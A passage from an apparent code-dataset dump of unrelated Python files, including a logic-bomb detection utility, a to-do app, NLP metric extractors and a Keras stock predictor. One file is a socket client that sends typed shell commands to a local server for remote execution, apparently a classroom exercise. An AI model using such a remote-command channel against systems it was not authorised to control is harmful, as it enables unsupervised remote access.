triggersFeaturesList[i] = triggersFeaturesList[i].split(\";\")\n triggersFeaturesList[i][3] = triggersFeaturesList[i][3].split(\"$$$\")[:-1]\n\n # Return\n if triggersFeaturesList is not np.nan:\n return triggersFeaturesList\n else:\n return np.nan\n\n# Print a trigger\ndef printTrigger(trigger):\n fv = trigger[0]\n method = trigger[1]\n condition = trigger[2]\n sources = trigger[3]\n\n print(\"\\n⚠️ 💣 - Possible Logic Bomb\")\n print(\"FV : {}\".format(fv))\n print(\"Method : {}\".format(method))\n print(\"Condition: {}\".format(condition))\n print(\"Sources :\")\n for s in sources:\n print(\" - {}\".format(s))\n\n return\n\n# Get the fields of a trigger\ndef getTriggerMethodAndSources(trigger):\n fv = trigger[0]\n method = trigger[1]\n condition = trigger[2]\n sources = trigger[3]\n\n return method, sources\n\n# Get the ID of the topic assigned by the LDA Model\ndef getLdaID(vectorizer, ldaModel ,description):\n \n # Needed for NLP\n st = nltk.stem.snowball.EnglishStemmer()\n english_vocab = set(w.lower() for w in nltk.corpus.words.words())\n stopwords = nltk.corpus.stopwords.words('english')\n corpus = []\n\n string = description\n string = re.sub(r'\\W',' ',string)\n string = re.sub(r'\\d','',string)\n tokens = nltk.word_tokenize(string)\n words = [st.stem(w) for w in tokens if len(w)>=3 and w.lower() not in stopwords and w.lower() in english_vocab] \n descriptionProcessed = ' '.join(words) \n corpus.append(descriptionProcessed)\n\n # Retrieve the Topic ID \n tf_array = vectorizer.transform(corpus)\n doc_topic = ldaModel.transform(tf_array)\n lda_id = doc_topic[0].argmax()\n\n return lda_id\n\n# Get the ID of the cluster assigned by the KMeans Model\ndef getKmeansID(vectorizer, kmeansModel ,description):\n \n # Needed for NLP\n st = nltk.stem.snowball.EnglishStemmer()\n english_vocab = set(w.lower() for w in nltk.corpus.words.words())\n stopwords = nltk.corpus.stopwords.words('english')\n corpus = []\n\n string = description\n string = re.sub(r'\\W',' ',string)\n string = re.sub(r'\\d','',string)\n tokens = nltk.word_tokenize(string)\n words = [st.stem(w) for w in tokens if len(w)>=3 and w.lower() not in stopwords and w.lower() in english_vocab] \n descriptionProcessed = ' '.join(words) \n corpus.append(descriptionProcessed)\n\n # Retrieve the kmeans ID \n tf_array = vectorizer.transform(corpus)\n kmeans_id = kmeansModel.predict(tf_array)\n\n return int(kmeans_id)\n\nimport openai\nopenai.api_key = OPENAI_API_KEY\n\ndef getGptEmbedding(text):\n # Model to be used - (Determine the price)\n model=\"text-embedding-ada-002\"\n\n # Remove new line chars\n text = text.replace(\"\\n\", \" \")\n \n # Return Embedding\n return openai.Embedding.create(input = [text], model=model)['data'][0]['embedding']\n\n\ndef getGcataID(kmeansModel ,description):\n description = preprocessDescriptionGcata(description)\n\n embedding = getGptEmbedding(description)\n embedding = np.array(embedding).reshape(1, -1)\n\n clusterID = kmeansModel.predict(embedding)\n\n return int(clusterID)\n\n\n###################### PREPROCESSING G-CatA ################################s\n# Remove all html tags from text\ndef remove_html(text):\n clean = re.compile('<.*?>')\n return re.sub(clean, '', text)\n\n# Remove all words that are not in the US+GB dictionary\ndef remove_non_english(text):\n d_us = enchant.Dict(\"en_US\")\n d_gb = enchant.Dict(\"en_GB\")\n # build custom dict\n alt_dicts = []\n for d_file in os.listdir('./0_Data/no-filter-dict'):\n with open(os.path.join('./0_Data/no-filter-dict', d_file), 'r') as ff:\n 
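# (Added note, hedged) Each file under ./0_Data/no-filter-dict is assumed to hold\n # whitespace-separated lowercase terms, collected here as an extra whitelist on\n # top of the en_US/en_GB enchant dictionaries.\n 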
list_terms = ff.read().lower().split()\n alt_dicts.extend(list_terms)\n new_text = ''\n for t in text.split():\n # if text is eith in US or GB english dict keep it\n if d_us.check(t) or d_gb.check(t):\n new_text = new_text + t + \" \"\n continue\n if t in alt_dicts:\n new_text = new_text + t + \" \"\n continue\n return new_text\n\n# Replace non ascii chars with spaces\ndef remove_non_ascii(text):\n printable = set(string.printable)\n return filter(lambda x: x in printable, text)\n\n# Replace punctuation chars '!\"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`{|}~' with spaces\ndef remove_punctuation(text):\n return ''.join(map(lambda c: ' ' if c in string.punctuation else c, text))\n\n# Remove words with no meaning or irrelevant for searching\ndef remove_stopwords(text):\n\n return ' '.join([s for s in text.split() if s not in\n stopwords.words('english')])\n\n# Extracts the root of every word \ndef apply_stemming(text):\n stemmer = SnowballStemmer(\"english\")\n tokens = word_tokenize(text)\n stemmed_tokens = map(stemmer.stem, tokens)\n return ' '.join(stemmed_tokens)\n\n# Part of Speech Detection\ndef wordnet_pos_code(tag):\n if tag.startswith('NN'):\n return wordnet.NOUN\n elif tag.startswith('VB'):\n return wordnet.VERB\n elif tag.startswith('JJ'):\n return wordnet.ADJ\n elif tag.startswith('RB'):\n return wordnet.ADV\n else:\n return wordnet.NOUN # default value\n\n# Lemmatization\ndef apply_lemmatization(text):\n lmtzr = WordNetLemmatizer()\n tokens = word_tokenize(text)\n pos_tokens = pos_tag(tokens)\n lemm_tokens = []\n for token, pos in pos_tokens:\n w = lmtzr.lemmatize(token, wordnet_pos_code(pos))\n lemm_tokens.append(w)\n return ' '.join(lemm_tokens)\n\n# Remove numbers from text\ndef remove_numbers(text):\n \n clean = re.compile('[0-9]')\n return re.sub(clean, '', text)\n\n# Text to lowercase, for stopwords and stuff\ndef do_lowercase(text): \n return text.lower()\n\n# Preprocess Descriptions\ndef preprocessDescriptionGcata(description):\n\n # Apply all the steps\n description = remove_html(description)\n description = remove_non_ascii(description)\n description = remove_punctuation(description)\n description = do_lowercase(description)\n description = remove_numbers(description)\n description = remove_stopwords(description)\n description = remove_non_english(description)\n description = apply_lemmatization(description)\n\n return description\n","repo_name":"kpister/prompt-linter","sub_path":"data/scraping/repos/Trustworthy-Software~DifuzerPlusPlus/difuzerUtils.py","file_name":"difuzerUtils.py","file_ext":"py","file_size_in_byte":9695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34196333054","text":"##To do list: Develop a program that allows the user to manage their tasks by adding,removing, and displaying them.\n\ntasks = [1, 23, 54, 78, 987]\n\ndef add_task():\n task = int(input(\"Enter the task to add: \"))\n tasks.append(task)\n print(\"Task added successfully!\")\ndef remove_task():\n if not tasks:\n print(\"No tasks to remove.\")\n return\n print(\"Current tasks:\")\n \n for i, task in enumerate(tasks, start=1):\n print(f\"{i}. {task}\")\n\n try:\n index = int(input(\"Enter the task number to remove: \")) - 1\n if 0 <= index < len(tasks):\n removed_task = tasks.pop(index)\n print(f\"Removed: {removed_task}\")\n else:\n print(\"Invalid task number.\")\n except ValueError:\n print(\"Invalid input. 
Please enter a number.\")\n\ndef display_tasks():\n if not tasks:\n print(\"No tasks added yet.\")\n return\n print(\"Tasks:\")\n for i, task in enumerate(tasks, start=1):\n print(f\"{i}. {task}\")\ndef main():\n while True:\n print(\"\\n===== To-Do List Manager =====\")\n print(\"1. Add Task\")\n print(\"2. Remove Task\")\n print(\"3. Display Tasks\")\n print(\"4. Exit\")\n\n choice = input(\"Enter your choice (1/2/3/4): \")\n\n if choice == '1':\n add_task()\n elif choice == '2':\n remove_task()\n elif choice == '3':\n display_tasks()\n elif choice == '4':\n print(\"Exiting the program. Goodbye!\")\n break\n else:\n print(\"Invalid choice. Please try again.\")\nif __name__ == \"__main__\":\n main()\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"KishoreM54/sightspectrum","sub_path":"mini_project3/mini project3.py","file_name":"mini project3.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"74485781595","text":"import sys,os\nimport traceback\nROOT_DIR = 'C:\\\\Users\\\\j16492\\\\PycharmProjects\\\\Scripts'\nimport logging\nlogger = logging.getLogger('ICS')\nlogger.setLevel(logging.DEBUG)\nwhile logger.hasHandlers():\n for i in logger.handlers:\n logger.removeHandler(i)\nformatter = logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s')\nfh = logging.FileHandler(filename=ROOT_DIR + '\\\\doc\\\\ics\\\\ics.log', encoding='utf-8', mode='w')\nfh.setLevel(logging.DEBUG)\nfh.setFormatter(formatter)\nlogger.addHandler(fh)\n\nimport threading\nimport xlwings as xw\nfrom icalendar import Calendar, Event\nfrom datetime import datetime, timedelta\nimport re, json, uuid, pytz\nsys.path.append(ROOT_DIR)\nfrom npl.TimeNormalizer import TimeNormalizer\nfrom doc.ics.InviteEmail import Invitor\nfrom doc.ics.RefuseEmail import Rejecter\nfrom doc.ics.Constants import *\n\nEXCEL_DIR = \"E:\\\\OutlookAttachments\\\\\"\nCOLON = \":\"\nTIMEZONE = pytz.timezone(\"Asia/Shanghai\")\nNOW = datetime.now(tz=TIMEZONE)\nCOLUMN_START = \"A\"\nCOLUMN_END = \"Q\"\nCOLUMN_NAME_ROW = 1\nKEY_COLUMN = \"C\"\nFILENAME_PATTERN = \".*招聘汇总\\-杭州.*\\.xlsx\"\nDEPARTMENT_SEERANALYZER = \"智能引擎\"\n\n\nclass InterviewICSGenerator:\n sheet = None\n columnNames = []\n interviews = []\n calendar = Calendar()\n invitor = Invitor()\n rejector = Rejecter()\n\n def __init__(self):\n logger.info(\"new instance\")\n self.calendar.add(\"x-wr-calname\", \"面试日程\")\n self._load_interviews()\n logger.info(\"interviews loaded\")\n\n def _load_interviews(self):\n for filename in os.listdir(EXCEL_DIR):\n if re.match(FILENAME_PATTERN, filename):\n self.sheet = xw.Book(EXCEL_DIR + filename).sheets[0]\n if not self.sheet:\n logger.warning(\"未找到招聘汇总EXCEL表格\")\n sys.exit(0)\n self.columnNames = self.sheet.range(\n COLUMN_START + str(COLUMN_NAME_ROW) + COLON + COLUMN_END + str(COLUMN_NAME_ROW)).value\n row = COLUMN_NAME_ROW + 1\n while self.sheet.range(KEY_COLUMN + str(row)).value:\n interview = {}\n for i in range(len(self.columnNames)):\n interview[self.columnNames[i]] = \\\n self.sheet.range(COLUMN_START + str(row) + COLON + COLUMN_END + str(row)).value[i]\n if DEPARTMENT_SEERANALYZER in interview.get(DEPARTMENT):\n self.interviews.append(interview)\n row += 1\n\n def _format_date(self, match):\n lent = len([word for word in re.split(r\"[./\\-年月]\", match.group()) if word])\n text = match.group()\n if lent == 3:\n text = re.sub(\"[./\\-年]\", \"年\", text, count=1)\n text = re.sub(\"[./\\-月]\", \"月\", 
text, count=1)\n if not re.search(\"[日号]$\", text):\n text = text + \"日\"\n return text\n\n def _parse_time(self, timeSlot, interview):\n if isinstance(timeSlot, datetime):\n return timeSlot.strftime(\"%Y-%m-%d %H:%M:%S\")\n slotStripped = re.sub(\"[这本]?下*个?(星期|周|礼拜)[一二三四五六日]\", \"\", timeSlot)\n slotFormated = re.sub(\n \"((20)?[1-2][0-9][./\\-年])?((10|11|12)|(0?[1-9]))[./\\-月](([12][0-9])|(30|31)|(0?[1-9]))[日号]?\",\n self._format_date, slotStripped)\n slotReserved = re.sub(\"[`~!@#$%^&*()_+=|{}';,\\[\\].<>?!¥…()/《》【】‘;”“’。,、?]\", \" \", slotFormated)\n timestamp = TimeNormalizer().parse(target=slotReserved,\n timeBase=NOW.replace(month=1, day=1, hour=0, second=0,\n microsecond=0).strftime(\"%Y-%m-%d %H:%M:%S\"))\n err = eval(timestamp).get(\"error\")\n if err:\n logger.error(err + \" \" + str(interview))\n return None\n return eval(timestamp).get(\"timestamp\") or eval(timestamp).get(\"timespan\")[0]\n def generate_ics(self):\n interview = \"not initialized\"\n timestamp = \"not initialized\"\n try:\n inviteThreads = []\n refuseThreads = []\n for interview in self.interviews:\n # set the event time\n slotOriginal = interview.get(RESERVED_SLOT)\n parsedTime = self._parse_time(slotOriginal, interview)\n if not parsedTime:\n continue\n dtstart = TIMEZONE.localize(datetime.strptime(parsedTime, \"%Y-%m-%d %H:%M:%S\")).astimezone(tz=pytz.utc)\n dtend = dtstart + timedelta(hours=2)\n # edit the basic information\n location = interview.pop(LOCATION)\n location = location if location else \"杭州\"\n interview[LOCATION.split(\"\\n\")[0]] = location\n interview[MOBILE] = int(interview[MOBILE])\n description = json.dumps(interview, indent=0, sort_keys=True, ensure_ascii=False)\n description = re.sub(\"[\\\"{},]\", \"\", description)\n summary = interview.get(NAME) + \" \" + interview.get(UNIVERSITY)\n inviteThread = threading.Thread(target=self.invitor.sendInvitation, args=(interview,))\n inviteThread.setDaemon(True)\n inviteThread.start()\n inviteThreads.append(inviteThread)\n refuseThread = threading.Thread(target=self.rejector.sendRejection, args=(interview,))\n refuseThread.setDaemon(True)\n refuseThread.start()\n refuseThreads.append(refuseThread)\n # create a new event\n event = Event()\n event.add(\"uid\", \"%s:%s:%s\" % (dtstart.timestamp(), interview.get(MOBILE), uuid.uuid4()))\n event.add(\"summary\", summary)\n event[\"dtstart\"] = dtstart.strftime(\"%Y%m%dT%H%M%SZ\")\n event[\"dtend\"] = dtend.strftime(\"%Y%m%dT%H%M%SZ\")\n event.add(\"description\", description)\n event.add(\"location\", location)\n self.calendar.add_component(event)\n logger.info(\"%s %s %s -> %s\" % (\n interview.get(DEPARTMENT), interview.get(NAME), slotOriginal, dtstart))\n for inviteThread in inviteThreads:\n inviteThread.join()\n for refuseThread in refuseThreads:\n refuseThread.join()\n with open(ROOT_DIR + '\\\\doc\\\\ics\\\\interview.ics', 'wb') as f:\n f.write(self.calendar.to_ical())\n f.close()\n except Exception as err:\n logger.error(str(err) + str(traceback.print_exc() or \" \"))\n logger.error(\"Interview: \"+str(interview))\n logger.error(\"Time: \"+str(timestamp))\n\n finally:\n if xw.apps.active:\n xw.apps.active.quit()\n\n def report_result(self):\n for interview in self.interviews:\n to = interview.get(EMAIL)\n candidate_name = interview.get(NAME)\n with self.invitor.getLock():\n with open(\"invitedlist\", \"r\") as f:\n invitedlist = f.read()\n if MARKED == interview.get(INVITEMAIL) and to not in invitedlist:\n self.invitor.addFailed(candidate_name + ' ' + to)\n with 
self.rejector.getLock():\n with open(\"refusedlist\", \"r\") as f:\n refusedlist = f.read()\n if MARKED == interview.get(REFUSEMAIL) and to not in refusedlist:\n self.rejector.addFailed(candidate_name + ' ' + to)\n logger.info(\"Invite succeed: %s, failed: %s\" % (len(self.invitor.getSent()), len(self.invitor.getFailed())))\n logger.info(\"Refuse succeed: %s, failed: %s\" % (len(self.rejector.getSent()), len(self.rejector.getFailed())))\n if self.invitor.getFailed():\n logger.info(\"Failed invitations:\")\n for i in self.invitor.getFailed():\n logger.info(i)\n if self.rejector.getFailed():\n logger.info(\"Failed rejections:\")\n for i in self.rejector.getFailed():\n logger.info(i)\n\n\nif __name__ == \"__main__\":\n try:\n x = InterviewICSGenerator()\n x.generate_ics()\n x.report_result()\n except Exception as err:\n logger.error(str(err) + str(traceback.print_exc() or \" \"))\n finally:\n if xw.apps.active:\n xw.apps.active.quit()\n","repo_name":"VilianLee/Scripts","sub_path":"doc/ics/InterviewICSGenerator.py","file_name":"InterviewICSGenerator.py","file_ext":"py","file_size_in_byte":8433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13722517010","text":"\"\"\" Extract metrics as Pandas DataFrame.\"\"\"\nfrom typing import Any, Dict, Iterable, List, Optional, Union\n\nimport pandas as pd\nfrom spacy.tokens import Doc\nfrom wasabi import msg\n\nfrom textdescriptives.utils import (\n _create_spacy_pipeline,\n _remove_textdescriptives_extensions,\n get_valid_metrics,\n)\n\n\ndef __get_quality(doc: Doc) -> dict:\n \"\"\"Get quality metrics as well as boolean indicator for passing filters.\"\"\"\n return doc._.quality.to_flat_value_dict()\n\n\ndef __get_descriptive_stats_dict(doc: Doc) -> dict:\n \"\"\"Get descriptive statistics as dictionary.\"\"\"\n return {\n **doc._.token_length,\n **doc._.sentence_length,\n **doc._.syllables,\n **doc._.counts,\n }\n\n\ndef extract_dict(\n docs: Union[Iterable[Doc], Doc],\n metrics: Union[List[str], str, None] = None,\n include_text: bool = True,\n) -> List[Dict[str, Any]]:\n \"\"\"Extract calculated metrics from a spaCy Doc or an iterable of Docs to a\n list of dictionaries.\n\n Args:\n docs (Union[Iterable[Doc], Doc]): An iterable of spaCy Docs or a single Doc\n metrics (Union[list[str], str, None], optional): Which metrics to extract.\n One or more of [\"descriptive_stats\", \"readability\",\n \"dependency_distance\", \"pos_proportions\", \"coherence\", \"quality\",\n \"information_theory\"]. 
Defaults to None in which case it will\n extract metrics for which a pipeline compoenent has been set.\n include_text (bool, optional): Whether to add an entry containing the text.\n Defaults to True.\n\n Returns:\n List[Dict[str, Any]]: List of dictionaries for each Doc with extracted metrics.\n \"\"\"\n if not isinstance(docs, Doc):\n return [extract_dict(doc, metrics, include_text)[0] for doc in docs]\n\n # extract textdescriptive metrics from the list of spacy Language factory\n valid_metrics = get_valid_metrics()\n\n if isinstance(metrics, str):\n metrics = [metrics]\n\n if metrics is None:\n metrics = [\n component for component in valid_metrics if docs.has_extension(component)\n ]\n\n if not set(metrics).issubset(valid_metrics):\n raise ValueError(\n \"'metrics' contained invalid metric.\\n\"\n + f\"Valid metrics are: {valid_metrics}\",\n )\n extracted_metrics: Dict[str, Any] = {}\n if include_text:\n extracted_metrics[\"text\"] = docs.text\n for component in metrics:\n if component == \"quality\":\n metric = __get_quality(docs)\n elif component == \"descriptive_stats\":\n metric = __get_descriptive_stats_dict(docs)\n else:\n metric = getattr(docs._, component)\n if metric:\n extracted_metrics.update(metric)\n\n return [extracted_metrics]\n\n\ndef extract_df(\n docs: Union[Iterable[Doc], Doc],\n metrics: Union[List[str], str, None] = None,\n include_text: bool = True,\n) -> pd.DataFrame:\n \"\"\"Extract calculated metrics from a spaCy Doc object or a generator of Docs\n from nlp.pipe to a Pandas DataFrame.\n\n Args:\n docs (Union[Iterable[Doc], Doc]): An iterable of spaCy Docs or a single Doc\n metrics (Union[list[str], str], optional): Which metrics to extract.\n One or more of [\"descriptive_stats\", \"readability\",\n \"dependency_distance\", \"pos_proportions\", \"coherence\", \"quality\",\n \"information_theory\"]. Defaults to None in which\n case it will extract metrics for which a pipeline compoenent has been\n set.\n include_text (bool, optional): Whether to add a column containing the text.\n Defaults to True.\n\n Returns:\n pd.DataFrame: DataFrame with a row for each doc and column for each metric.\n \"\"\"\n return pd.DataFrame(extract_dict(docs, metrics, include_text))\n\n\ndef extract_metrics(\n text: Union[str, List[str]],\n lang: Optional[str] = None,\n metrics: Optional[Iterable[str]] = None,\n spacy_model: Optional[str] = None,\n spacy_model_size: str = \"lg\",\n) -> pd.DataFrame:\n \"\"\"Extract metrics from a text or a list of texts to a Pandas dataframe.\n\n Args:\n text (Union[str, List[str]]): A text or a list of texts.\n lang (str, optional): Language of the text. If lang is set and no spacy\n model is provided, will automatically download and use a spacy\n model for the language. Defaults to None.\n metrics (List[str]): Which metrics to extract.\n One or more of [\"descriptive_stats\", \"readability\",\n \"dependency_distance\", \"pos_proportions\", \"coherence\", \"quality\",\n \"information_theory\"]. If None, will extract all metrics from\n textdescriptives. Defaults to None.\n spacy_model (str, optional): The spacy model to use. If not set,\n will download one based on lang. 
Defaults to None.\n spacy_model_size (str, optional): Size of the spacy model to download.\n\n Returns:\n pd.DataFrame: DataFrame with a row for each text and column for each metric.\n \"\"\"\n if isinstance(metrics, str):\n metrics = [metrics]\n\n if spacy_model is None and lang is None:\n raise ValueError(\"Either a spacy model or a language must be provided.\")\n\n if spacy_model is not None and lang is not None:\n msg.info(\n \"Both a spacy model and a language were provided. \"\n + \"Will use the spacy model and ignore language.\",\n )\n\n if metrics is None:\n metrics = get_valid_metrics()\n\n # remove previously set metrics to avoid conflicts\n _remove_textdescriptives_extensions()\n\n # load spacy model if any component requires it\n nlp = _create_spacy_pipeline(\n spacy_model=spacy_model,\n lang=lang,\n metrics=metrics,\n spacy_model_size=spacy_model_size,\n )\n\n # add pipeline components\n if \"all\" in metrics:\n nlp.add_pipe(\"textdescriptives/all\")\n else:\n for component in metrics:\n nlp.add_pipe(f\"textdescriptives/{component}\")\n\n if isinstance(text, str):\n text = [text]\n docs = nlp.pipe(text)\n\n return extract_df(docs)\n","repo_name":"HLasse/TextDescriptives","sub_path":"src/textdescriptives/extractors.py","file_name":"extractors.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"50"}{"seq_id":"37651223794","text":"from collections import Counter, defaultdict\nfrom typing import List\n\nclass Solution:\n def findAnagrams(self, s: str, p: str) -> List[int]:\n counter1 = Counter(p)\n counter = defaultdict(int)\n l=0\n r=0\n res = []\n while r < len(s):\n counter[s[r]] = 1 + counter.get(s[r], 0)\n \n if r - l + 1== len(p):\n if counter1 == counter:\n res.append(l)\n counter[s[l]] -= 1\n if counter[s[l]] == 0:\n del counter[s[l]]\n l += 1\n r += 1\n return res","repo_name":"AmanuelAbel/A2SV-competitive-programming","sub_path":"find-all-anagrams-in-a-string.py","file_name":"find-all-anagrams-in-a-string.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}{"seq_id":"10965328959","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 29 11:25:50 2019\n\n@author: hicaro\n\"\"\"\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras import losses\nfrom keras.optimizers import SGD\nfrom keras import initializers\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler\nfrom bot import getDados\n\n\nclass PMC:\n\n result = None\n queda = False\n\n def __init__(self):\n\n dd = getDados()\n\n # data collection\n dataset = np.loadtxt('vale.csv', delimiter = ',')\n\n #np.savetxt(\"/home/hicaro/Área de Trabalho/Projeto PMC/resultados.csv\", dataset, delimiter=\",\")\n #print(dataset)\n # split the data into samples (x) and desired output (y) \n #dados = dataset\n scaler = StandardScaler().fit(dataset)\n dataset = scaler.transform(dataset)\n dataset.tofile('dadosbaixados.csv', sep = ',')\n X = dataset[:,1:5]\n Y = dataset[:,0]\n\n # creating the sequential model\n model = Sequential()\n\n model.add(Dense(100,kernel_initializer=initializers.RandomUniform(minval=-1, maxval=1, seed=4),input_dim=4, activation='tanh'))\n model.add(Dense(50,kernel_initializer=initializers.RandomUniform(minval=-1, maxval=1, seed=4), activation='tanh'))\n model.add(Dense(50,kernel_initializer=initializers.RandomUniform(minval=-1, 
maxval=1, seed=4), activation='tanh'))\n model.add(Dense(1,kernel_initializer=initializers.RandomUniform(minval=-1, maxval=1, seed=4),activation='tanh'))\n # Compile Model\n # compiling the model with the squared-error loss, the gradient descent (sgd)\n # optimization algorithm with learning rate 0.5, and accuracy as the evaluation metric\n model.compile(loss=losses.mean_squared_error, optimizer=SGD(lr=0.001,momentum=0.0), metrics=[\"accuracy\",\"mse\"])\n # Evaluation of the model based on the metric name \n\n history = model.fit(X, Y, epochs=6000, batch_size=168,verbose=1)\n scores = model.evaluate(X, Y)\n \n # Making predictions\n # calculate predictions\n predictions = model.predict(X, batch_size=168)\n predictions = (predictions > 0)\n rounded = [round(x[0]) for x in predictions]\n #print(rounded)\n rounded = np.array(rounded)\n dataset = np.column_stack((dataset, rounded))\n \n \n plt.plot(history.history['mean_squared_error'])\n plt.title('Modelo EQM')\n plt.ylabel('mse')\n plt.xlabel('epocas')\n plt.legend(['treinamento','teste'],loc='upper left')\n plt.show() \n \n print(\"\\n%s: %.6f\" % (model.metrics_names[0], scores[0]))\n print(\"\\n%s: %.6f\" % (model.metrics_names[1], scores[1]))\n print(\"\\n%s: %.6f\" % (model.metrics_names[2], scores[2]))\n\n # Operation phase\n dd.getDados_do_dia()\n\n # data collection\n dataset = np.loadtxt('valetoday.csv', delimiter = ',')\n\n #print(dataset)\n # split the data into samples (x) and desired output (y) \n #dados = dataset\n scaler = StandardScaler().fit(dataset)\n dataset = scaler.transform(dataset)\n entrada = dataset[:,1:5]\n dataset.tofile('dadosreais.csv', sep = ',')\n\n predictions_1 = model.predict(entrada)\n predictions_1.tofile('dadosprevistos.csv', sep = ',')\n predictions = (predictions_1 > 0)\n i = 0\n total = 0\n for prediction in predictions:\n if prediction == True:\n i = i + 1\n total = total + 1\n\n i = round((i/total) * 100,2)\n if i < 50:\n self.queda = True\n i = 100 - i\n self.result = str(i) + \" %\"\n\n def getResult(self):\n return self.result","repo_name":"Josehpequeno/Projeto-PMC","sub_path":"PMC.py","file_name":"PMC.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}{"seq_id":"24893237052","text":"N = int(input())\ntotalStrLen = 3\nk = 0\nwhile N > totalStrLen:\n totalStrLen = 2 * totalStrLen + k+4\n k += 1\nk += 3\n\ndef dfs(strLen, k, N):\n x = int((strLen - k) / 2)\n if x < N <= x + k:\n N -= x\n if N == 1:\n print('m')\n else:\n print('o')\n return\n\n if x >= N:\n dfs(x, k - 1, N)\n else:\n dfs(x, k - 1, N - (x + k))\n\ndfs(totalStrLen, k, N)\n","repo_name":"AlPomo/AlgorithmReview","sub_path":"Baekjoon/Week05/5904.py","file_name":"5904.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}{"seq_id":"28726443931","text":"cont = 1\nwhile cont <= 10:\n print(cont, '->', end=' ')\n cont += 1\nprint('Acabou')\n\n'''\nRunning forever:\ncont = 1\nwhile True:\n print(cont, '->', end=' ')\n cont += 1\n'''\n# Stops when '999' is typed\n'''\nn = s = 0\nwhile n != 999:\n n = int(input('Digite um número: '))\n s += n\nprint(f'Soma: {s}')\n'''\n\nn = s = 0\nwhile True:\n n = int(input('Digite um número: '))\n if n == 999:\n break\n s += n\nprint(f'Soma: {s}')\n","repo_name":"paulo-emilio/Python-3-Curso-em-Video","sub_path":"Mundo 2/Aula 14 e Aula 15 - Repetição 
(While)/aula15_a_interrompendo_repeticoes_while.py","file_name":"aula15_a_interrompendo_repeticoes_while.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"19758874439","text":"#coding utf-8\n\nimport socket\n\nporta = 17017\nhost = '127.0.0.1'\n\nsocketTCP = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ndest = (host, porta)\n\nsocketTCP.connect(dest)\n\nwhile True:\n print(\"\\nDigite o comando a ser executado: \")\n comando = input()\n socketTCP.send(comando.encode('utf-8'))\n saidaComando = socketTCP.recv(1024).decode()\n print('\\n' + saidaComando)\n\n if comando == 'exit':\n socketTCP.close()\n break\n","repo_name":"jose-de-melo/sistemas_distribuidos_2018","sub_path":"comandos_remotos/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"23792916795","text":"import json\n\n\nclass Serializable:\n def __init__(self, *args):\n self.args = args\n\n def serialize(self):\n return json.dumps({\"args\": self.args})\n\n\nclass Point2D(Serializable):\n def __init__(self, x, y):\n super().__init__(x, y)\n self.x = x\n self.y = y\n\n\nclass Deserializable(Serializable):\n @classmethod\n def deserialize(cls, json_data):\n params = json.loads(json_data)\n return cls(*params[\"args\"])\n\n\nclass BetterPoint2D(Deserializable):\n pass\n\n\npoint = Point2D(5, 3)\na = point.serialize()\nb = BetterPoint2D.deserialize(a)\nprint(b)\n","repo_name":"innjuun/Algorithm","sub_path":"LeetCode/medium/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"38897081183","text":"import csv\nimport random\nimport pyfpgrowth\ndef rand (start , end , count ):\n res=[];\n for i in range(count):\n res.append(random.randint(start, end));\n return res;\n\ndef main():\n\n #transactions = [[1, 2, 5],[2, 4],[2, 3],[1, 2, 4],[1, 3],[2, 3],[1, 3],[1, 2, 3, 5],[1, 2, 3]]\n\n tableId=rand(1,100,1000);\n userId1=rand(1,25,500);\n userId2=rand(10,40,500);\n result=[]\n for item in range (1000):\n if (item%3==0):\n result.append(\"w\");\n else:\n result.append(\"l\");\n #with open(\"game_data.csv\", \"w\", newline=\"\") as f:\n # writer = csv.writer(f)\n # writer.writerows(data)\n #tableId = [str(i) for i in tableId];\n #userId1 = [str(i)+\"w\" for i in userId1];\n #userId2 = [str(i)+\"l\" for i in userId2];\n userId=userId1+userId2;\n for item in range(len(userId)):\n if (item%3==0):\n userId[item]=str(userId[item])+result[item]\n else:\n userId[item]=str(userId[item])+result[item]\n data=[[userId[val],tableId[val]] for val in range(1000)];\n transactions =[];\n inner=[]\n for i in range(1,101):\n for j in range(len(data)):\n if data[j][1]==i:\n inner.append(data[j][0]);\n transactions.append(inner);\n inner=[]\n patterns = pyfpgrowth.find_frequent_patterns(transactions, 4);\n for keys,values in patterns.items():\n print(keys,\" \",values )\n\nif __name__ == \"__main__\":\n main();\n","repo_name":"naveen270397/ml","sub_path":"source1.py","file_name":"source1.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"39912042399","text":"from tkinter import messagebox as mb\nimport datetime as dt\nfrom Sql import BaseDeDatos\nfrom patrones import patronfecha\n\n\nclass 
